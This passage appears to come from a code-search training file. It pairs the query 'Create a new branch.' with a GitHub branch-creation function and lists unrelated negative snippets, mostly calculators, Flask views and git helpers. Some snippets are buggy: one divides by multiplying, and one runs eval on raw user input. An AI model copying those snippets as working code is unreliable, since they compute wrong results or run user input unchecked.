int(request.args.get('b'))\n return str(add(a,b))", "def handle(req):\n return logic(req)", "def welcome_func():\n\n print('Welcome to Calculator')\n operation_func()", "def call_calculator(args=None, stdout=False):\r\n\r\n parser = create_parser()\r\n\r\n if args is None:\r\n args = parser.parse_args()\r\n\r\n # print(vars(args))\r\n\r\n # taking the first operation in args namespace\r\n # if combo, e.g. -a and -s, take the first one\r\n for operation, numbers in vars(args).items():\r\n\r\n if numbers is None:\r\n continue\r\n\r\n # print(operation, numbers)\r\n # print(type(operation), type(numbers))\r\n\r\n try:\r\n num_list = [float(i) for i in list(numbers)]\r\n\r\n except:\r\n raise InvalidArgType(\"arg list to be operated on should only have numbers \")\r\n\r\n try:\r\n res = calculator(operation, num_list)\r\n\r\n except ZeroDivisionError:\r\n res = 0\r\n\r\n if stdout:\r\n print(res)\r\n\r\n return res", "def operation_func():\n\n operation_input = input(\"\\nPlease type in the math operation you would like to complete:\\n+ for addition\\n- for subtraction\\n* for multiplication\\n/ for division : \")\n operation_list = [\"+\", \"-\", \"*\", \"/\"]\n if not operation_input in operation_list: \n print('\\nYou have not typed a valid operator!!! \\nPlease enter the math operation again.')\n operation_func()\n\n return calculate_func(operation_input)", "def show_calculations(self):\n self.view.set_sum(self.model.get_sum())\n self.view.set_diff(self.model.get_diff())", "def get_input():\r\n operation = input()\r\n\r\n return operation", "def task_calc():\n return 'What is the result of the expression?'", "def process_menu_page(self):\r\n self.print_options(self.menu,1)\r\n\r\n \"\"\"\r\n Asks for user input. Then redirects to the appropriate function.\r\n \"\"\"\r\n n = (input(\"What would you like to do? 
Please input the correpsonding integer:\"))\r\n\r\n if n == str(1):\r\n self.file_import()\r\n elif n == str(2):\r\n self.view_data()\r\n elif n == str(3):\r\n self.analysis()\r\n elif n == str(4):\r\n self.save()\r\n elif n == str('q'):\r\n quit()\r\n else:\r\n raise InputError(\"Please input a valid digit or 'q'\")", "def index():\n if request.method == 'GET':\n\n\n return render_template('index.html')\n \n if request.method == 'POST':\n\n message = request.form['text']\n data_vector = text_vector.transform([message])\n data_transform = text_transformer.transform(data_vector)\n prediction = lsvc_model.predict(data_transform)\n # output_prediction = lsvc_model.predict(data_transform)\n \n # return render_template('result.html', output_prediction = prediction)\n return render_template('index.html', output_prediction = prediction)", "def addition():\r\n error_handler()\r\n f1.delete(0, END)\r\n a1 = float(operand.get())\r\n a2 = float(operator.get())\r\n result = a1 + a2\r\n f1.insert(10, str(result))", "def calculator():\r\n print(logo)\r\n num1 = float(input(\"Enter your first number: \"))\r\n for operand in calc_operand:\r\n print(operand)\r\n\r\n user_continue = False\r\n while not user_continue:\r\n calc_operation = input(\"Enter the operation: \")\r\n num2 = float(input(\"Enter your next number: \"))\r\n call_func = calc_operand[calc_operation]\r\n answer = call_func(num1, num2)\r\n print(f\"{num1} {calc_operation} {num2} = {answer}\")\r\n user_selection = input(\r\n f\"Type 'y' to continue calculation with {answer} or 'n' to start new one: \")\r\n\r\n if user_selection == \"y\":\r\n num1 = answer\r\n elif user_selection == \"n\":\r\n user_continue = True\r\n calculator()\r\n else:\r\n print(\"Invalid option. Please select valid input\")\r\n calculator()", "def _route(self, request, url):\n operationIndex = url[:-1].rfind('/')\n processorPath = url[:operationIndex]\n processor = self.api_processor_map.get(processorPath.lower()) \n operation = url[operationIndex+1:].rstrip('/').lower()\n \n http_methods, is_admin, is_cron = self.api_const.get_api_operation_perms(operation)\n \n if is_cron and users.get_current_user() is not None and not users.is_current_user_admin() :\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if is_admin and not is_cron and not users.is_current_user_admin():\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if request.method not in http_methods:\n raise self.api_error.ApiError(self.api_error.API_ERROR_INVALID_HTTP_METHOD, request.method, operation)\n \n if is_cron :\n context.get_context().set_login_required(False)\n \n return self._process(request, processor(), operation)", "def main():\r\n eq = input(\"Input an equation: \")\r\n splitList = (mysplit(eq))\r\n operandsList = []\r\n #This loop takes in the split list and adds to a list without operators\r\n for operand in splitList:\r\n if operand == '+' or operand == '-' or operand == '*' or operand == '/':\r\n continue\r\n operandsList.append(operand)\r\n operatorsList = []\r\n #This loop takes in the split list and adds to a list without digits\r\n for operator in splitList:\r\n if operator.isdigit() is True:\r\n continue\r\n operatorsList.append(operator)\r\n #variable to check if the operator is allowed\r\n operatorChecker = False\r\n for sign in operatorsList:\r\n if sign == '+' or sign == '-' or sign == '/' or sign == '*':\r\n operatorChecker = True\r\n else:\r\n operatorChecker = False\r\n operandsDigits = 
''.join(operandsList)\r\n #this checks if the operands are digits\r\n operandsChecker = str.isdigit(operandsDigits)\r\n #check if equation contains division with 0\r\n if '/ 0' in eq:\r\n zeroChecker = False\r\n else:\r\n zeroChecker = True\r\n\r\n #if conditions for the\r\n if operandsChecker is False or operatorChecker is False or zeroChecker is False:\r\n print(\"Invalid Input\")\r\n else:\r\n stack, queue = parseNumbers(eq)\r\n stackAnswer = calculateStack(stack)\r\n queueAnswer = calculateQueue(queue)\r\n print(\"Queue total:\", queueAnswer)\r\n print(\"Stack total:\", stackAnswer)\r\n if queueAnswer == stackAnswer:\r\n print(\"They do match!\")\r\n else:\r\n print(\"They do not match!\")", "def calculate(operandOne, operandTwo, operation):\r\n if operation == '+':\r\n return operandOne + operandTwo\r\n elif operation == '-':\r\n return operandOne - operandTwo\r\n elif operation == '*':\r\n return operandOne * operandTwo\r\n elif operation == '/':\r\n return operandOne // operandTwo", "def calculate_expression(number1, number2, operator):\n\n if operator == '+':\n return number1 + number2\n elif operator == '-':\n return number1 - number2\n elif operator == '*':\n return number1 * number2", "def run():\n reset_calc()\n finish = False\n printCurrent()\n while not finish:\n printMenu()\n\n m = input().strip()\n if (m == 'x'):\n finish = True\n elif (m == '+'):\n m = input(\"Give nominator:\")\n n = input(\"Give denominator:\")\n try:\n calc_add (int(m), int(n))\n printCurrent()\n except ValueError:\n print (\"Enter integers for m, n, with not null n\")\n elif (m=='c'):\n reset_calc()\n printCurrent()\n elif (m=='u'):\n undo()\n printCurrent()\n else:\n print (\"Invalid command\")\n\n print (\"By!!!\")", "def directions_calc(self):\n \n # create route_dict, {'radio_button_name': {'geometries': list of coords,\n # 'values': list of values}}\n route_dict = self._selectInput()\n \n # generate lists with locations and values\n (start_layer_name,\n end_layer_name) = [x.objectName() for x in self.radio_buttons]\n \n locations_list = list(product(route_dict[start_layer_name]['geometries'],\n route_dict[end_layer_name]['geometries']))\n values_list = list(product(route_dict[start_layer_name]['values'],\n route_dict[end_layer_name]['values']))\n \n # If row-by-row in two-layer mode, then only zip the locations\n if all([button.isChecked() for button in self.radio_buttons]) and self.dlg.routing_twolayer_rowbyrow.isChecked():\n locations_list = list(zip(route_dict[start_layer_name]['geometries'],\n route_dict[end_layer_name]['geometries']))\n\n values_list = list(zip(route_dict[start_layer_name]['values'],\n route_dict[end_layer_name]['values']))\n\n # Add via point if specified\n route_via = None\n if self.dlg.routing_via_label.text() != 'Long,Lat':\n route_via = [float(x) for x in self.dlg.routing_via_label.text().split(\",\")]\n \n message_bar, progress_widget = progressbar.pushProgressBar(self.iface)\n \n responses = []\n delete_values = []\n for i, coords_tuple in enumerate(locations_list):\n if coords_tuple[0] == coords_tuple[-1]:\n # Skip when same location\n delete_values.append(i)\n continue\n if route_via:\n # add via coords\n coords_tuple = list(coords_tuple)\n coords_tuple.insert(1, route_via)\n \n # Update progress bar\n percent = (i/len(locations_list)) * 100\n message_bar.setValue(percent)\n \n # Make the request\n self.params['coordinates'] = convert.build_coords(coords_tuple)\n responses.append(self.client.request(self.url, self.params))\n \n # Delete entries in values_list where 
coords where the same\n values_list = [value for idx, value in enumerate(values_list) if idx not in delete_values]\n \n # Only proceed when there actual responses\n if responses: \n layer_out = self._addLine(responses, values_list)\n layer_out.updateExtents()\n \n QgsProject.instance().addMapLayer(layer_out)\n \n self.iface.messageBar().popWidget(progress_widget)", "def preview_formcalc(self, get):\r\n\r\n result = {'preview': '',\r\n 'error': ''}\r\n\r\n try:\r\n formula = get['formula']\r\n except KeyError:\r\n result['error'] = \"No formula specified.\"\r\n return result\r\n\r\n result['request_start'] = int(get.get('request_start', 0))\r\n\r\n try:\r\n # TODO add references to valid variables and functions\r\n # At some point, we might want to mark invalid variables as red\r\n # or something, and this is where we would need to pass those in.\r\n result['preview'] = latex_preview(formula)\r\n except pyparsing.ParseException as err:\r\n result['error'] = \"Sorry, couldn't parse formula\"\r\n result['formula'] = formula\r\n except Exception:\r\n # this is unexpected, so log\r\n log.warning(\r\n \"Error while previewing formula\", exc_info=True\r\n )\r\n result['error'] = \"Error while rendering preview\"\r\n\r\n return result", "def pressed_op(self, event: Button.Pressed) -> None:\n self.right = Decimal(self.value or \"0\")\n self._do_math()\n assert event.button.id is not None\n self.operator = event.button.id", "def cpt_calc():\n\n if request.method == \"POST\":\n testmin = float(request.form.get(\"techTestMin\"))\n scoremin = float(request.form.get(\"techScoreMin\"))\n computerTestCheckBox = request.form.get(\"computer-test-checkbox\")\n\n # If the \"Computer Testing\" prompt is selected, indicate as such\n if computerTestCheckBox:\n compCheckBox = \"✓\"\n else:\n compCheckBox = \"\"\n\n testhr = testmin / 60\n scorehr = scoremin / 60\n totalmin = testmin + scoremin\n totalhr = totalmin / 60\n\n # Calculate time for 96138 (\"eight\") and work towards calculating 96139 (\"nine\")\n eight_min = 30\n remaining = totalmin - 30\n\n # Calcuate the technician's remaining time divided by 30 to determine whether the person meets the cutoff for >50% of unit 96138\n remaining_30 = remaining / 30\n\n # Round the whole number down\n remaining_floor = math.floor(remaining_30)\n fractional, whole = math.modf(remaining_30)\n\n # Cutoff is set at 16 out of 30 minutes\n cutoff = 0.53\n\n # Add an extra unit to 96139 if user input meets the cutoff\n if fractional >= cutoff:\n extra = 1\n else:\n extra = 0\n\n if eight_min == 30:\n eight = 1\n\n nine = remaining_floor + extra\n\n return render_template('/index.html', techTestMin=testmin, techScoreMin=scoremin, techTestHr=round(testhr, 2),\n testScoreHr=round(scorehr, 2),techTotalHr=round(totalhr, 2), techTotalMin=round(totalmin, 2),\n eight=eight, nine=nine, neurCheckBox=compCheckBox)\n else:\n return render_template(\"index.html\")", "def run(request):\n print(\"This is the run() method\")\n \n #load str\n payload = json.loads(request)\n \n return f\"/n Returning the input for testing: {payload}\"", "def request_input(self, possibles=[]):\n answer = self.console.input('Type your request here:')\n if len(possibles) > 0 and self.numeric:\n invalid = True\n while invalid:\n try:\n answer = int(answer)\n invalid = False\n break\n except:\n answer = self.console.input('Type your request here (numbers only):')\n\n answer = possibles[answer - 1]\n else:\n if answer.find('quit') != -1:\n self.running = False\n else:\n if answer.find('quit') != -1:\n self.running 
= False\n return answer", "def home():\n\n form = SubmissionForm(request.form)\n\n # Form has been submitted\n if request.method == 'POST' and form.validate():\n\n # Plug in the data into a dictionary object \n # - data from the input form\n # - text data must be converted to lowercase\n data = {\n \"Inputs\": {\n \"input1\": {\n \"ColumnNames\": [\n \"Open\",\n \"High\",\n \"Low\",\n \"Close\",\n \"Volume\",\n \"T3_Vol_Diff\",\n \"T3_Close_Diff\",\n \"T3_Open_Diff\",\n \"T2_Vol_Diff\",\n \"T2_Close_Diff\",\n \"T2_Open_Diff\",\n \"T1_Vol_Diff\",\n \"T1_Close_Diff\",\n \"T1_Open_Diff\",\n \"Prior_Day_Vert_Delta_Ratio\",\n \"Retracement_Signal\",\n \"Prior_Day_Derivative\",\n \"T+1_Close\",\n ],\n \"Values\": [\n [\n form.Open.data,\n form.High.data,\n form.Low.data,\n form.Close.data,\n form.Volume.data,\n form.T3_Vol_Diff.data,\n form.T3_Close_Diff.data,\n form.T3_Open_Diff.data,\n form.T2_Vol_Diff.data,\n form.T2_Close_Diff.data,\n form.T2_Open_Diff.data,\n form.T1_Vol_Diff.data,\n form.T1_Close_Diff.data,\n form.T1_Open_Diff.data,\n form.Prior_Day_Vert_Delta_Ratio.data,\n form.Retracement_Signal.data,\n form.Prior_Day_Derivative.data,\n \"\"\n ]\n ]\n }\n },\n \"GlobalParameters\": {}\n}\n\n # Serialize the input data into json string\n body = str.encode(json.dumps(data))\n# str.encode\n # Formulate the request\n #req = urllib.request.Request(URL, body, HEADERS)\n req = urllib.request.Request(Bayesian_URL, body, HEADERS)\n\n # Send this request to the AML service and render the results on page\n try:\n # response = requests.post(URL, headers=HEADERS, data=body)\n response = urllib.request.urlopen(req)\n #print(response)\n respdata = response.read()\n result = json.loads(str(respdata, 'utf-8'))\n result = do_something_pretty(result)\n # result = json.dumps(result, indent=4, sort_keys=True)\n return render_template(\n 'result.html',\n title=\"This is the result from AzureML running our example T+1 Prediction:\",\n result=result)\n\n # An HTTP error\n except urllib.error.HTTPError as err:\n result=\"The request failed with status code: \" + str(err.code)\n return render_template(\n 'result.html',\n title='There was an error',\n result=result)\n #print(err)\n\n # Just serve up the input form\n return render_template(\n 'form.html',\n form=form,\n title='Run App',\n year=datetime.now().year,\n message='Demonstrating a website using Azure ML Api')", "def runOperation(operation, num1, num2):\n if operation == 1 or operation == '+':\n print(add(num1, num2))\n elif operation == 2 or operation == '-':\n print(sub(num1, num2))\n elif operation == 3 or operation == '*':\n print(mul(num1, num2))\n elif operation == 4 or operation == '/':\n print(div(num1, num2))\n else:\n print(\"I don't understand\")", "def eval(self, string):\n tokens = string.split()\n op1 = int(tokens.pop(0))\n operator = tokens.pop(0)\n op2 = int(tokens.pop(0))\n if operator == '+':\n return op1 + op2\n elif operator == '-':\n return op1 - op2\n elif operator == '*':\n return op1 * op2\n elif operator == '/':\n return op1 * op2\n else:\n raise CalculatorException(\"Unknown operator %s\" % operator)", "def handle_calculate(self, text_input):\n self.output_text = f'{float(self.get_valid_value(text_input)) * MILE_TO_KM_FACTOR:.3f}'", "def execute():\n # print('Wow')\n result = gui.controller.main('execute')\n print(result)\n\n return render_template('results.html', data=json.dumps(result))", "def all_compare_operators(request):\n return request.param", "def dispatch(self):\t\n\n\t\tinput = []\n\t\tfor option_tuple in 
self.options.__dict__.items(): #build list of input for route reconciliation\n\t\t\tif option_tuple[1]:\n\t\t\t\tinput.append(option_tuple[0])\n\t\ttry:\n\t\t\tcontroller_results = self.callables[self.__conventionalizeParams(input)].__call__()\n\n\t\texcept KeyError:\n\t\t\traise Exception(\"Undefined route given params, %s\" % self.__conventionalizeParams(input))\n\n\t\t\n\t\tif type(controller_results) is tuple: #TODO make decorator pass in view name, instead of a default\n\t\t\treturn ViewBase(controller_results[1]).flush()\n\t\telif type(controller_results) is list:\n\t\t\treturn RawView(controller_results).flush()\n\t\telse:\n\t\t\traise Exception(\"Unsupported controller result type: %s\" % str(type(controller_results)))", "def evaluate(self):\n self.getInput()\n try:\n self.result = eval(self.userInput)\n except ZeroDivisionError:\n self.entry.delete(0, END)\n self.entry.insert(0, \"Not a number\")\n except SyntaxError:\n self.entry.delete(0, END)\n self.entry.insert(0, \"Input error\")\n else:\n self.entry.delete(0, END)\n self.entry.insert(0, self.result)", "def interface(request):\n return request.param", "def home(request):\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n form = ExecuteForm(request.POST)\n if form.is_valid():\n param_values = form.param_values()\n active_requirements = retrieve_governance_processes.get_active_requirements(param_values)\n req_items = retrieve_governance_processes.get_requirement_items(active_requirements)\n \n tb = governance_tree_builder.GovernanceTreeBuilder()\n tree_string = tb.pretty_print_items_support([i.id for i in req_items[\"condition_items\"]])\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Result',\n \"tree_string\": tree_string\n }\n )\n else:\n form = ExecuteForm()\n\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home',\n \"execute_form\": form\n }\n )", "def getcmd(self):\n n_step = self.params['n_step']\n self.params['mode'] = \"normal\"\n line = raw_input(\"the filter mode: <normal/greedy> [default: normal] \\n > \")\n if line.strip() != \"\":\n self.params['model'] = line.strip()\n \n line = raw_input(\"conditions (maybe integer or float) [default: 1.0] \\n > \")\n mystring = line.strip()\n if mystring == \"\":\n self.params['ratio0'] = 1.0\n self.params['n_step0'] = n_step\n elif \".\" in mystring:\n self.params['ratio0'] = float(mystring)\n self.params['n_step0'] = int(n_step * float(mystring))\n else:\n self.params['n_step0'] = int(mystring)\n if self.params['n_step0'] > n_step:\n print \"invalid value...\"\n exit(1)\n \n return", "def multiplication():\r\n error_handler()\r\n f1.delete(0, END)\r\n m1 = float(operand.get())\r\n m2 = float(operator.get())\r\n result = m1 * m2\r\n f1.insert(10, str(result))", "def subtraction():\r\n error_handler()\r\n f1.delete(0, END)\r\n s1 = float(operand.get())\r\n s2 = float(operator.get())\r\n result = s1 - s2\r\n f1.insert(10, str(result))", "def operands(app):\n return cdr(app)", "def route(self):\n pass", "def index():\r\n message = ''\r\n if request.method == 'POST':\r\n inputs = request.form.get('n').split(\",\")\r\n int_input = list(map(int,inputs))\r\n result = \",\".join(list(map(str,bubble_sort(int_input))))\r\n message = result\r\n return render_template('index.html',message=message)", "def solving(num1, num2, opt):\n res = 0\n if opt == '*':\n res = num1 * num2\n elif opt == '/':\n try:\n res = num1 / num2\n except ZeroDivisionError:\n res = 0\n elif opt == '+':\n res = num1 + num2\n elif opt == '-':\n res = num1 - 
num2\n return abs(res)", "def index():\n\n # User reached route via GET (as by clicking a link or via redirect)\n if request.method == \"GET\":\n\n # FORM TABLE total SELECT name for lookup(name) of now price, price, total costmoney ,totalshares\n portf = db.execute(\"SELECT name, symbol, price, sharesTotal, costmoneyTotal FROM total WHERE userID = :userID\", userID=session[\"user_id\"])\n\n # Len of portf list, rows\n porLen = len(portf)\n\n # For loop portf index \"nowPrice\" to new dict, costmoneyTotal\n for item in range(porLen):\n e = portf[item][\"symbol\"]\n nowPrice = lookup(e).get(\"price\")\n portf[item]['nowPrice'] = nowPrice\n portf[item]['costmoneyTotal'] = usd(portf[item]['costmoneyTotal'])\n\n # List reversed\n portf = list(reversed(portf))\n\n\n # FORM TABLE users SELECT end cash\n endPrice = db.execute(\"SELECT cash FROM users WHERE id = :userID\", userID=session[\"user_id\"])\n\n endPrice = usd(endPrice[0][\"cash\"])\n return render_template(\"index.html\", portf=portf, endPrice = endPrice, porLen=porLen)", "def main():\r\n # Get chosen operation from the user.\r\n action = input('Select \"(1-TS) tcpsend\", or \"(2-TR) tcpreceive\":')\r\n # Execute the chosen operation.\r\n if action in ['1', 'TS', 'ts', 'tcpsend']:\r\n tcp_send(OTHER_HOST, TCP_PORT)\r\n elif action in ['2', 'TR', 'tr', 'tcpreceive']:\r\n tcp_receive(TCP_PORT)\r\n else:\r\n print('Unknown action: \"{0}\"'.format(action))", "def main():\r\n # Get chosen operation from the user.\r\n action = input('Select \"(1-TS) tcpsend\", or \"(2-TR) tcpreceive\":')\r\n # Execute the chosen operation.\r\n if action in ['1', 'TS', 'ts', 'tcpsend']:\r\n tcp_send(OTHER_HOST, TCP_PORT)\r\n elif action in ['2', 'TR', 'tr', 'tcpreceive']:\r\n tcp_receive(TCP_PORT)\r\n else:\r\n print('Unknown action: \"{0}\"'.format(action))", "def all_compare_operators(request: Any) -> Any:\n return request.param" ]
[ "0.6870682", "0.62640357", "0.62640357", "0.6200235", "0.60145706", "0.6007947", "0.5992822", "0.59635174", "0.5928874", "0.58482105", "0.58049804", "0.5771265", "0.5717723", "0.56060153", "0.5605487", "0.5560057", "0.55397177", "0.5519091", "0.54609567", "0.5438152", "0.5435091", "0.54101866", "0.53456396", "0.53453314", "0.5325303", "0.52900976", "0.5283863", "0.5276989", "0.52728236", "0.5272486", "0.5257471", "0.52550673", "0.52461827", "0.52253425", "0.52221024", "0.5210351", "0.5203189", "0.5198857", "0.5192873", "0.5186485", "0.51782066", "0.5139056", "0.5133442", "0.51311666", "0.51151824", "0.5068751", "0.50680894", "0.5055706", "0.5055706", "0.50536877", "0.5051493", "0.50389737", "0.5023377", "0.500207", "0.49959722", "0.49931437", "0.4992032", "0.49917138", "0.4980804", "0.49797615", "0.49649656", "0.4950696", "0.49381483", "0.4918651", "0.49159056", "0.49001515", "0.48919818", "0.48855147", "0.4883687", "0.48713142", "0.48690385", "0.48638672", "0.48549414", "0.48548827", "0.48476812", "0.4847256", "0.48464158", "0.48450333", "0.48430282", "0.4839662", "0.48344165", "0.48061833", "0.48060712", "0.4802666", "0.48025596", "0.48002458", "0.47922385", "0.47918716", "0.47918123", "0.4791457", "0.47852948", "0.47849858", "0.47783563", "0.47764012", "0.4771321", "0.47639346", "0.47579837", "0.47540814", "0.47540814", "0.47536626" ]
0.5568533
15
Create a new branch.
def create_branch(self, name, base_name, from_sha=False): logger.debug( 'GitHubAPI.create_branch: name={}, base_name={}'.format( name, base_name ) ) # raise an error if we can find the branch, continue if we get # a 404 try: self.get_branch(name) except requests.exceptions.HTTPError: pass else: raise DuplicateBranchError( 'Branch already started. Run' '\n\tgit fetch --all && get checkout {}'.format(name) ) if not from_sha: base = self.get_branch(base_name) base_sha = base['object']['sha'] else: base_sha = base_name try: branch_info = { 'ref': 'refs/heads/{}'.format(name), 'sha': base_sha } except KeyError: logger.error('base repsonse: {}'.format(base)) raise Exception( 'Could not locate the current SHA for '.format(base_name)) resp = self.post('git/refs', json=branch_info) try: resp.raise_for_status() except Exception: logger.error(resp.json()) raise return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_branch(self):\n os.chdir(str(self.repository_path))\n sh.git.checkout('master')\n sh.git.checkout('-b', self.branch)\n logger.debug('Branch {} created', self.branch)", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException as _:\n log.xmark()\n raise", "def main(github_token, branch_name, repository, sha):\n create_branch(github_token, branch_name, repository, sha)\n click.echo(f\"Successfully created branch {branch_name}\")", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def branch_new(request, repo_id):\n repo = models.Repository.get_by_id(int(repo_id))\n if request.method != 'POST':\n form = BranchForm(initial={'url': repo.url,\n 'category': 'branch',\n })\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n form = BranchForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n branch = models.Branch(\n repo_key=repo.key,\n category=form.cleaned_data.get('category'),\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n branch.repo_name = repo.name\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def test_heads_create_new_branch_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert repository.head.commit == branch.commit", "def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:\n self.__verify_repo_initialized()\n if (not is_ascii(name)) or (not is_suitable_user_key(name)):\n err = ValueError(\n f'Branch name provided: {name} invalid. Must contain only alpha-numeric '\n f'or \".\" \"_\" \"-\" ascii characters. 
And be <= 64 Characters')\n raise err from None\n createdBranch = heads.create_branch(\n branchenv=self._env.branchenv,\n name=name,\n base_commit=base_commit)\n return createdBranch", "def create_branch_from_issue(jira_url, jira_username, jira_api_key, project_key, source_branch_name, issue_key):\n click.echo('Branch \"{}\" was created'.format(\n create_branch_func(\n source_branch_name, get_branch_name(jira_url, jira_username, jira_api_key, issue_key, project_key)\n )\n ))", "def branch(self, name, ref=\"HEAD\"):\n self._git.create_head(name, ref)\n self.checkout(name)", "def create_topic_branch(self, topic_branch_name):\n print(\"Creating topic branch locally...\")\n self.git.checkout(self.base_branch)\n self.git.checkout('-b', topic_branch_name)\n print(\"Pushing topic branch to base branch's remote...\")\n self.git.push('-u', self.base_branch_remote(), topic_branch_name)", "def test_heads_create_new_branch_at_another_branch(repository: Repository) -> None:\n main = repository.head\n branch1 = repository.heads.create(\"branch1\")\n\n repository.checkout(branch1)\n repository.commit()\n\n repository.checkout(main)\n branch2 = repository.heads.create(\"branch2\", branch1.commit)\n\n assert branch1.commit == branch2.commit", "def create_branch(branch, orphaned=False, changeto=False, directory=None):\n current_branch = get_current_branch(directory)\n try:\n if orphaned:\n execute_command('git symbolic-ref HEAD refs/heads/' + branch,\n cwd=directory)\n execute_command('rm -f .git/index', cwd=directory)\n execute_command('git clean -fdx', cwd=directory)\n cmd = 'git commit --allow-empty -m \"Created orphaned branch '\\\n '{0}\"'.format(branch)\n execute_command(cmd, cwd=directory)\n if changeto:\n current_branch = None\n else:\n execute_command('git branch {0}'.format(branch), cwd=directory)\n if changeto:\n checkout(branch, directory=directory)\n current_branch = None\n finally:\n if current_branch is not None:\n checkout(current_branch, directory=directory)", "def branch(self, new_branch_id: str, empty: bool = False) -> None:\n self._check_connection()\n if empty:\n source = {}\n elif self._ref:\n source = {\n \"origin\": f\"{self._account}/{self._db}/{self._repo}/commit/{self._ref}\"\n }\n else:\n source = {\n \"origin\": f\"{self._account}/{self._db}/{self._repo}/branch/{self._branch}\"\n }\n\n self._dispatch(\"post\", self._branch_url(new_branch_id), source)", "def _make_release_branch(self):\n user = getpass.getuser()\n if not user == self._user:\n raise Error('the command should only be run as user %s' % self._user)\n branch = self._branch\n # get the latest master updates\n subprocess.check_call('git remote update', shell=True)\n subprocess.check_call('git checkout master', shell=True)\n # does a git pull and updates the submodules\n GitUtil.update_submodules()\n # get the latest commit before the release is cut\n self._latest_commit = GitUtil.get_latest_commit()\n print 'Making release branch %s' % branch\n # create the new release branch\n GitUtil.create_branch(branch)\n print TermColor.ColorStr('Created remote branch %s' % branch, 'GREEN')", "def create_branch(self, new_branch, delete_empty=False):\n logger.info(\"Preparing to create branch {} from {}\".format(new_branch, self.config.branch))\n try:\n # create new branch\n self.provider.create_branch(\n base_branch=self.config.branch,\n new_branch=new_branch,\n repo=self.user_repo\n )\n logger.info(\"Created branch {} from {}\".format(new_branch, self.config.branch))\n return True\n except BranchExistsError:\n logger.info(\"Branch 
{} exists.\".format(new_branch))\n # if the branch exists, is empty and delete_empty is set, delete it and call\n # this function again\n if delete_empty:\n if self.provider.is_empty_branch(self.user_repo, self.config.branch, new_branch,\n self.config.branch_prefix):\n self.provider.delete_branch(self.user_repo, new_branch,\n self.config.branch_prefix)\n logger.info(\"Branch {} was empty and has been deleted\".format(new_branch))\n return self.create_branch(new_branch, delete_empty=False)\n logger.info(\"Branch {} is not empty\".format(new_branch))\n return False", "def test_heads_create_new_branch_at_ancestor(repository: Repository) -> None:\n parent = repository.head.commit\n updatefile(repository.path / \"a\")\n branch = repository.heads.create(\"branch\", parent)\n assert parent == branch.commit", "def test_heads_create_existing_branch_force(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n branch = heads.create(\"branch\", head.commit)\n updatefile(repository.path / \"a\")\n heads.create(branch.name, head.commit, force=True)\n assert head.commit == branch.commit", "def test_heads_create_existing_branch(repository: Repository) -> None:\n heads = repository.heads\n branch = heads.create(\"branch\", repository.head.commit)\n with pytest.raises(pygit2.AlreadyExistsError):\n heads.create(branch.name, branch.commit)", "def branch(branch_name):\n env.branch = branch_name", "def branch(branch_name):\n env.branch = branch_name", "def checkout_new_branch(self, branchname, current_path):\n p = Popen(\n [\"git\", \"checkout\", \"-b\", branchname],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n my_output, my_error = p.communicate()\n if p.returncode == 0:\n return {\"code\": p.returncode, \"message\": my_output.decode(\"utf-8\")}\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git checkout \" + \"-b\" + branchname,\n \"message\": my_error.decode(\"utf-8\"),\n }", "def create_branch_with_patch(self,\n branch_name,\n message,\n patch,\n author,\n force_push=False):\n self.clean()\n\n try:\n # This won't be exercised in production because wpt-exporter\n # always runs on a clean machine. But it's useful when running\n # locally since branches stick around.\n _log.info('Deleting old branch %s', branch_name)\n self.run(['git', 'branch', '-D', branch_name])\n except ScriptError:\n # This might mean the branch wasn't found. 
Ignore this error.\n pass\n\n _log.info('Creating local branch %s', branch_name)\n self.run(['git', 'checkout', '-b', branch_name])\n\n # Remove Chromium WPT directory prefix.\n patch = patch.replace(RELATIVE_WPT_TESTS, '')\n\n _log.info('Author: %s', author)\n if '<' in author:\n author_str = author\n else:\n author_str = '%s <%s>' % (author, author)\n\n # TODO(jeffcarp): Use git am -p<n> where n is len(RELATIVE_WPT_TESTS.split(/'))\n # or something not off-by-one.\n self.run(['git', 'apply', '-'], input=patch)\n self.run(['git', 'add', '.'])\n self.run(['git', 'commit', '--author', author_str, '-am', message])\n\n # Force push is necessary when updating a PR with a new patch\n # from Gerrit.\n if force_push:\n self.run(['git', 'push', '-f', 'origin', branch_name])\n else:\n self.run(['git', 'push', 'origin', branch_name])", "def test_branch_can_be_copied():\n\n setup_org()\n setup_repo()\n\n responses.add(responses.GET, \"https://api.github.com/repos/my-org/my-repo/branches/master\",\n body=my_repo_branch,\n content_type='text/json',\n status=200)\n\n responses.add(responses.POST, \"https://api.github.com/repos/my-org/my-repo/git/refs\",\n body=my_new_ref,\n content_type='text/json',\n status=201)\n\n responses.add(responses.GET, \"https://api.github.com/repos/my-org/my-repo/branches/main\",\n body=my_repo_branch,\n content_type='text/json',\n status=200)\n\n token = '__dummy__'\n org = \"my-org\"\n client = GithubRestClient(token)\n new_branch_name = \"main\"\n\n repo = get_repository(client, org, \"my-repo\")\n new_branch = copy_branch(repo, repo.default_branch, new_branch_name)\n assert None is not new_branch", "def post_comment_branch(user, branch_id, comment):\r\n\tfrom browse.models import BranchComment\r\n\tfrom accounts.models import 